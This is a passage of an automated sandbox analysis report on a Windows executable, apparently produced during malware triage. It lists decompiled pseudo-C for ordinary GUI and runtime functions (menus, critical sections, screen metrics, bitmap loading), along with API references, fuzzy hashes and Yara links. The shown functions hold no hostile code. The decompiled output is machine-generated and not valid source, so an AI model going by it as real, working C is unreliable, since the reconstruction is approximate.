                                                                        • WaitMessage.USER32(00000000,00456DAE,?,?,?,004798C4), ref: 00456D8E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CurrentCursorMessageThreadWait
                                                                        • String ID: 0`I
                                                                        • API String ID: 535285469-2983702033
                                                                        • Opcode ID: fd7b748d22305817f75c0356da75bbd64efc841958b29063c3cd77700d717242
                                                                        • Instruction ID: 01c0c099075671609aed48f59db28b1b43af4afac0b60e9a9ce997fa6d685819
                                                                        • Opcode Fuzzy Hash: fd7b748d22305817f75c0356da75bbd64efc841958b29063c3cd77700d717242
                                                                        • Instruction Fuzzy Hash: 0731D830A04248DFDB11DFA5C846B9EB7F5EB45305FA284BAEC00A7352D7796E48CB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00424370, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E00424370(intOrPtr __eax, void* __edx, void* __edi) {
				intOrPtr _v8;
				char _v92;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t41;
				void* _t43;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t66;
				intOrPtr _t67;

				_t59 = __edi;
				_t64 = _t66;
				_t67 = _t66 + 0xffffffa8;
				_push(_t60);
				_t43 = __edx;
				_v8 = __eax;
				if(__edx == 0) {
					L2:
					_push(0x496a44);
					L004068AC();
					_push(_t64);
					_push(0x424428);
					_push( *[fs:eax]);
					 *[fs:eax] = _t67;
					if(_t43 == 0) {
						E00402EF0( &_v92, 0x54);
						E00424D94(_v8, _t43, 0, 0, _t59, _t60, 0, 0,  &_v92);
					} else {
						_t61 = _t43;
						E00423824( *((intOrPtr*)(_t61 + 0x28)));
						E00423828( *((intOrPtr*)(_v8 + 0x28)));
						 *((intOrPtr*)(_v8 + 0x28)) =  *((intOrPtr*)(_t61 + 0x28));
						 *((char*)(_v8 + 0x21)) =  *((intOrPtr*)(_t61 + 0x21));
						 *((intOrPtr*)(_v8 + 0x34)) =  *((intOrPtr*)(_t61 + 0x34));
						 *((char*)(_v8 + 0x38)) =  *((intOrPtr*)(_t61 + 0x38));
					}
					_pop(_t52);
					 *[fs:eax] = _t52;
					_push(E0042442F);
					_push(0x496a44);
					L004069F4();
					return 0;
				} else {
					_t57 =  *0x41e4f8; // 0x41e544
					if(E00403768(__edx, _t57) == 0) {
						_t41 = E00414AEC(_v8, _t43);
						return _t41;
					} else {
						goto L2;
					}
				}
			}


















                                                                        0x00424370
                                                                        0x00424371
                                                                        0x00424373
                                                                        0x00424377
                                                                        0x00424378
                                                                        0x0042437a
                                                                        0x0042437f
                                                                        0x00424396
                                                                        0x00424396
                                                                        0x0042439b
                                                                        0x004243a2
                                                                        0x004243a3
                                                                        0x004243a8
                                                                        0x004243ab
                                                                        0x004243b0
                                                                        0x004243f7
                                                                        0x0042440b
                                                                        0x004243b2
                                                                        0x004243b2
                                                                        0x004243b7
                                                                        0x004243c2
                                                                        0x004243cd
                                                                        0x004243d6
                                                                        0x004243df
                                                                        0x004243e8
                                                                        0x004243e8
                                                                        0x00424412
                                                                        0x00424415
                                                                        0x00424418
                                                                        0x0042441d
                                                                        0x00424422
                                                                        0x00424427
                                                                        0x00424381
                                                                        0x00424383
                                                                        0x00424390
                                                                        0x00424454
                                                                        0x0042445e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00424390

                                                                        APIs
                                                                        • RtlEnterCriticalSection.KERNEL32(00496A44), ref: 0042439B
                                                                        • RtlLeaveCriticalSection.KERNEL32(00496A44,0042442F,00000000,00424428,?,00496A44), ref: 00424422
                                                                          • Part of subcall function 00424D94: RtlEnterCriticalSection.KERNEL32(00496A44,00000000,?,?), ref: 00424E37
                                                                          • Part of subcall function 00424D94: RtlLeaveCriticalSection.KERNEL32(00496A44,00424E82,00496A44,00000000,?,?), ref: 00424E75
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave
                                                                        • String ID: DA
                                                                        • API String ID: 3168844106-2080325668
                                                                        • Opcode ID: 5d0da1682d0e5b429fc274aee8455fbd1da520e3d31fc12b12d033f2833a3ec8
                                                                        • Instruction ID: c0367e46b2f5dfdd1aae6d6533981f87ee97dc4ca3a2f4a29e9ac0bbf231dd87
                                                                        • Opcode Fuzzy Hash: 5d0da1682d0e5b429fc274aee8455fbd1da520e3d31fc12b12d033f2833a3ec8
                                                                        • Instruction Fuzzy Hash: B0210B347042459FCB10EF99D982A9EB7F5EF8C314BA141BAB805E7751CA38ED01DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00449774, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00449774(void* __eax, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				intOrPtr* _t27;
				intOrPtr _t29;
				void* _t39;
				intOrPtr _t42;
				intOrPtr _t45;
				int _t50;
				void* _t51;

				_t51 = __eax;
				_t39 = 0;
				_t50 = E004496B8(__eax, 1, __edx);
				if(_t50 == 0) {
					if(( *(_t51 + 0x1c) & 0x00000010) == 0) {
						_t45 =  *0x445600; // 0x44564c
						if(E00403768(_t51, _t45) != 0) {
							E0044878C( *((intOrPtr*)(_t51 + 0x34)));
						}
					}
				} else {
					if(( *(_t50 + 0x1c) & 0x00000010) == 0) {
						E0044878C(_t50);
					}
					 *((intOrPtr*)( *_t50 + 0x44))();
					_t24 = E00448E24(_t50, _t39, 0, _t50, _t51);
					if((_t24 | E00449320(_t50, 0)) != 0) {
						E004467FC(_t50, 0);
					}
					_t27 =  *0x495ad0; // 0x496c04
					_t29 =  *((intOrPtr*)( *_t27 + 0x44));
					if(_t29 != 0) {
						_t42 = _t29;
						if( *((char*)(_t42 + 0x22f)) == 2 && _t50 ==  *((intOrPtr*)(_t42 + 0x258)) && SendMessageA( *(_t42 + 0x254), 0x234, 0, 0) != 0) {
							DrawMenuBar(E0043CC2C(_t42));
						}
					}
					_t39 = 1;
				}
				return _t39;
			}














                                                                        0x00449777
                                                                        0x00449779
                                                                        0x00449784
                                                                        0x00449788
                                                                        0x00449818
                                                                        0x0044981c
                                                                        0x00449829
                                                                        0x0044982e
                                                                        0x0044982e
                                                                        0x00449829
                                                                        0x0044978e
                                                                        0x00449792
                                                                        0x00449796
                                                                        0x00449796
                                                                        0x0044979f
                                                                        0x004497a6
                                                                        0x004497ba
                                                                        0x004497be
                                                                        0x004497be
                                                                        0x004497c3
                                                                        0x004497ca
                                                                        0x004497cf
                                                                        0x004497d7
                                                                        0x004497e0
                                                                        0x0044980b
                                                                        0x0044980b
                                                                        0x004497e0
                                                                        0x00449810
                                                                        0x00449810
                                                                        0x00449838

                                                                        APIs
                                                                        • SendMessageA.USER32 ref: 004497FA
                                                                        • DrawMenuBar.USER32(00000000,?,00000234,00000000,00000000), ref: 0044980B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DrawMenuMessageSend
                                                                        • String ID: LVD
                                                                        • API String ID: 2625368238-462541549
                                                                        • Opcode ID: 9d3d48822c4483685cc29d77eb33797c0968a31a1f1403c72cd18c5fa7b84299
                                                                        • Instruction ID: cfaac2668dddabe2e03c8476e39bbb8de488bb8272c0d5f02b7a156072d18efa
                                                                        • Opcode Fuzzy Hash: 9d3d48822c4483685cc29d77eb33797c0968a31a1f1403c72cd18c5fa7b84299
                                                                        • Instruction Fuzzy Hash: AF117C307006404BEB21FF6E8C8576B67966F86308F58547AF804CB392DA79EC06A79D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00436968, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00436968(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E00414264( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E00414208(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E00435F4C(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                                                                        0x00436971
                                                                        0x0043697e
                                                                        0x00436991
                                                                        0x00436995
                                                                        0x004369e5
                                                                        0x004369e5
                                                                        0x00436997
                                                                        0x00436997
                                                                        0x00436997
                                                                        0x004369a1
                                                                        0x004369a7
                                                                        0x00000000
                                                                        0x004369af
                                                                        0x004369b4
                                                                        0x004369c8
                                                                        0x004369df
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004369df
                                                                        0x00000000
                                                                        0x004369e1
                                                                        0x004369e1
                                                                        0x00000000
                                                                        0x00436997
                                                                        0x004369e9
                                                                        0x004369f2

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Rect$EqualIntersect
                                                                        • String ID: @
                                                                        • API String ID: 3291753422-2766056989
                                                                        • Opcode ID: b9d5a125bf218a009a68829a8c95d56b8c1c78d079be63f4ef73db18c465e3ad
                                                                        • Instruction ID: 4b7c01e8749ac2bd4959e066d72cd119708752121d29ea447919de7842c2e686
                                                                        • Opcode Fuzzy Hash: b9d5a125bf218a009a68829a8c95d56b8c1c78d079be63f4ef73db18c465e3ad
                                                                        • Instruction Fuzzy Hash: 1B1106716042486BCB01DA6CC885BDFBBEC9F49318F044292FC04EB342CB79DD448794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004717DC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 42%
                                                                        			E004717DC(char __edx, void* __edi, void* __esi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t12;
				signed int _t21;
				signed int _t22;
				signed int _t25;
				void* _t28;
				void* _t31;
				void* _t32;
				char _t33;
				signed int _t37;
				void* _t39;
				void* _t40;
				void* _t41;
				void* _t42;

				_t40 = __esi;
				_t39 = __edi;
				_t33 = __edx;
				if(__edx != 0) {
					_t42 = _t42 + 0xfffffff0;
					_t12 = E00403940(_t12, _t41);
				}
				_v5 = _t33;
				_t31 = _t12;
				E00438AC4(_t31, _t32, 0, _t39, _t40);
				E00435D68(_t31, GetSystemMetrics(2));
				E00435D8C(_t31, GetSystemMetrics(0x14));
				_t21 =  *(_t31 + 0x4c);
				_t37 = _t21;
				_t22 = _t21 >> 1;
				if(0 < 0) {
					asm("adc eax, 0x0");
				}
				E00435D8C(_t31, _t37 + _t22);
				 *((char*)(_t31 + 0x208)) = 1;
				 *((short*)(_t31 + 0x212)) = 0x64;
				 *((intOrPtr*)(_t31 + 0x214)) = 1;
				 *((char*)(_t31 + 0x228)) = 1;
				 *((char*)(_t31 + 0x229)) = 1;
				 *((char*)(_t31 + 0x21e)) = 1;
				_t25 =  *0x47188c; // 0x80
				 *(_t31 + 0x50) =  !_t25 &  *(_t31 + 0x50);
				_t28 = _t31;
				if(_v5 != 0) {
					E00403998(_t28);
					_pop( *[fs:0x0]);
				}
				return _t31;
			}




















                                                                        0x004717dc
                                                                        0x004717dc
                                                                        0x004717dc
                                                                        0x004717e3
                                                                        0x004717e5
                                                                        0x004717e8
                                                                        0x004717e8
                                                                        0x004717ed
                                                                        0x004717f0
                                                                        0x004717f6
                                                                        0x00471806
                                                                        0x00471816
                                                                        0x0047181b
                                                                        0x0047181e
                                                                        0x00471820
                                                                        0x00471822
                                                                        0x00471824
                                                                        0x00471824
                                                                        0x0047182b
                                                                        0x00471830
                                                                        0x00471837
                                                                        0x00471840
                                                                        0x0047184a
                                                                        0x00471851
                                                                        0x00471858
                                                                        0x0047185f
                                                                        0x00471869
                                                                        0x0047186c
                                                                        0x00471872
                                                                        0x00471874
                                                                        0x00471879
                                                                        0x00471880
                                                                        0x00471888

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MetricsSystem
                                                                        • String ID: d
                                                                        • API String ID: 4116985748-2564639436
                                                                        • Opcode ID: 19e6b5c28e468764134af8d16d4fbe5a215d9376d4effbce3a1d784a4ddeab67
                                                                        • Instruction ID: 0b87a267c4685935d203ee5a8c4fb54ab077512866400b8bfe7b889297467223
                                                                        • Opcode Fuzzy Hash: 19e6b5c28e468764134af8d16d4fbe5a215d9376d4effbce3a1d784a4ddeab67
                                                                        • Instruction Fuzzy Hash: 351182717443409BE700EF7D98CA3857AD05B1530CF0890BDEC488F397DABE95488369
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004274B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E004274B0(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x496ac7 != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x496aa8; // 0x4274b0
					 *0x496aa8 = E00427218(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x496aa8(_a4, _a8, _t19);
				}
				return _t16;
			}













                                                                        0x004274b6
                                                                        0x004274c0
                                                                        0x004274ea
                                                                        0x004274f3
                                                                        0x0042751b
                                                                        0x0042751b
                                                                        0x004274f5
                                                                        0x004274f5
                                                                        0x004274fa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004274fa
                                                                        0x004274c2
                                                                        0x004274c7
                                                                        0x004274d4
                                                                        0x004274e6
                                                                        0x004274e6
                                                                        0x00427526

                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 004274FE
                                                                        • GetSystemMetrics.USER32 ref: 00427510
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MetricsSystem$AddressProc
                                                                        • String ID: MonitorFromPoint
                                                                        • API String ID: 1792783759-1072306578
                                                                        • Opcode ID: f7ecf0ea672574d08a9988f9cecea0da0792823a781f49fc23c9cb090435b35f
                                                                        • Instruction ID: 0ca1a078767922ccf2f9ab2b13178130f2d88d21fff11c5ab282216ea325be36
                                                                        • Opcode Fuzzy Hash: f7ecf0ea672574d08a9988f9cecea0da0792823a781f49fc23c9cb090435b35f
                                                                        • Instruction Fuzzy Hash: 0201A232309224BFDB004F55FC84B5ABB55EB55364FD18037FA09ABA11D779DC818BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043E63C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E0043E63C(void* __eax, char __ecx, struct HWND__* __edx, void* __eflags, char _a4) {
				char _v8;
				char _v12;
				char _v16;
				int* _t22;
				void* _t28;

				_v8 = __ecx;
				_t28 = __eax;
				_t22 = 0;
				if(E00443514(__eax) != 0) {
					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
						E0043E6A0(_t28, _t32);
						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
						_t5 =  &_a4; // 0x434668
						E0043E42C(__edx,  *_t5, _v8,  &_v16);
						_t7 =  &_v12; // 0x434668
						_push( *_t7);
						_push(_v16);
						_push( *((intOrPtr*)(_t28 + 0x6c)));
						L00426B08();
						asm("sbb ebx, ebx");
						_t22 =  &(__edx->i);
					}
				}
				return _t22;
			}








                                                                        0x0043e645
                                                                        0x0043e64a
                                                                        0x0043e64c
                                                                        0x0043e657
                                                                        0x0043e659
                                                                        0x0043e65c
                                                                        0x0043e660
                                                                        0x0043e667
                                                                        0x0043e66e
                                                                        0x0043e676
                                                                        0x0043e67b
                                                                        0x0043e67e
                                                                        0x0043e682
                                                                        0x0043e686
                                                                        0x0043e687
                                                                        0x0043e68f
                                                                        0x0043e691
                                                                        0x0043e691
                                                                        0x0043e65c
                                                                        0x0043e69a

                                                                        APIs
                                                                          • Part of subcall function 0043E6A0: 734518F0.COMCTL32(?,00000000,0043E665,00000000,00000000,00000000), ref: 0043E6B8
                                                                          • Part of subcall function 0043E42C: ClientToScreen.USER32(?,C), ref: 0043E444
                                                                          • Part of subcall function 0043E42C: GetWindowRect.USER32 ref: 0043E44E
                                                                        • 73451850.COMCTL32(?,?,hFC,?,00000000,00000000,00000000), ref: 0043E687
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 73451873451850ClientRectScreenWindow
                                                                        • String ID: hFC$hFC
                                                                        • API String ID: 1718620977-3271904332
                                                                        • Opcode ID: 8eed95cc1c404b6fc45a057da765cb1baadc94690517fec50dbe15e3b690cb91
                                                                        • Instruction ID: 83cfaa479dfe381d88bbdac577f0f16f2725ff20e945c221232cd3b5c31a28e6
                                                                        • Opcode Fuzzy Hash: 8eed95cc1c404b6fc45a057da765cb1baadc94690517fec50dbe15e3b690cb91
                                                                        • Instruction Fuzzy Hash: D9F06277B012096B8B10DE9E98C189EF7ACEB4C224B54817BF518D3341D635EE148794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00427388, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E00427388(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x496ac6 != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x496aa4; // 0x427388
					 *0x496aa4 = E00427218(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x496aa4(_t14, _t17);
				}
				return _t19;
			}












                                                                        0x0042738e
                                                                        0x00427391
                                                                        0x0042739b
                                                                        0x004273c0
                                                                        0x004273c9
                                                                        0x004273f0
                                                                        0x004273f0
                                                                        0x0042739d
                                                                        0x004273a2
                                                                        0x004273af
                                                                        0x004273bc
                                                                        0x004273bc
                                                                        0x004273fb

                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 004273D9
                                                                        • GetSystemMetrics.USER32 ref: 004273E5
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MetricsSystem$AddressProc
                                                                        • String ID: MonitorFromRect
                                                                        • API String ID: 1792783759-4033241945
                                                                        • Opcode ID: 853a7fc467a0f53b6e0ee6d63dab54201dbae885feac652f51bdea48347bc6ca
                                                                        • Instruction ID: f4212cdc0bcdd90a97bb4186d0bbb8f5baa078fbbc89cb2f22bd8dfda28a6ed8
                                                                        • Opcode Fuzzy Hash: 853a7fc467a0f53b6e0ee6d63dab54201dbae885feac652f51bdea48347bc6ca
                                                                        • Instruction Fuzzy Hash: D4017C323081249BDB20CB64E985716BB59EB52390F958067EC05EB612C6B8DC40DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00462F50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00462F50(void* __eax) {
				void* __ebp;
				char _t7;
				char _t8;
				struct HINSTANCE__* _t12;
				void* _t15;
				signed int _t16;
				void* _t19;
				CHAR** _t20;

				_t19 = __eax;
				_t7 =  *0x462fb0; // 0x0
				 *((char*)(__eax + 0x2b8)) = _t7;
				_t8 =  *0x462fb0; // 0x0
				 *((char*)(__eax + 0x2b9)) = _t8;
				_t16 = 0;
				_t20 = 0x47ac24;
				do {
					 *((intOrPtr*)(_t19 + 0x2bc + _t16 * 4)) = E004242CC(1);
					_t12 =  *0x496714; // 0x400000
					_t15 = E00425494(_t10, LoadBitmapA(_t12,  *_t20));
					_t16 = _t16 + 1;
					_t20 =  &(_t20[1]);
				} while (_t16 != 5);
				return _t15;
			}











                                                                        0x00462f54
                                                                        0x00462f56
                                                                        0x00462f5b
                                                                        0x00462f61
                                                                        0x00462f66
                                                                        0x00462f6c
                                                                        0x00462f6e
                                                                        0x00462f73
                                                                        0x00462f81
                                                                        0x00462f8b
                                                                        0x00462f9a
                                                                        0x00462f9f
                                                                        0x00462fa0
                                                                        0x00462fa3
                                                                        0x00462fac

                                                                        APIs
                                                                        • LoadBitmapA.USER32 ref: 00462F91
                                                                          • Part of subcall function 00425494: GetObjectA.GDI32(?,00000054,?), ref: 004254CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: BitmapLoadObject
                                                                        • String ID: DA$d-F
                                                                        • API String ID: 4240920667-4117158572
                                                                        • Opcode ID: 8d380a7cc6438939fa926292fecba264169c2880adfe122f86d8d0340b6fd245
                                                                        • Instruction ID: d86268dc89174e040b3bdf134327d5a64c67eb724b5f3c86b08247b70b8e43d5
                                                                        • Opcode Fuzzy Hash: 8d380a7cc6438939fa926292fecba264169c2880adfe122f86d8d0340b6fd245
                                                                        • Instruction Fuzzy Hash: 95F0E2257042906FC2009FAEADC0986FBA8E749215751017BE948C7322C6696841977D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0044692C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0044692C(void* __eax) {
				void* _t16;
				intOrPtr _t17;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
					_t17 =  *0x445600; // 0x44564c
					if(E00403768( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
					} else {
						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
					}
					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
						E004459E0();
					}
					E004466C8(_t16);
				}
				return  *((intOrPtr*)(_t16 + 0x34));
			}





                                                                        0x0044692d
                                                                        0x00446933
                                                                        0x00446938
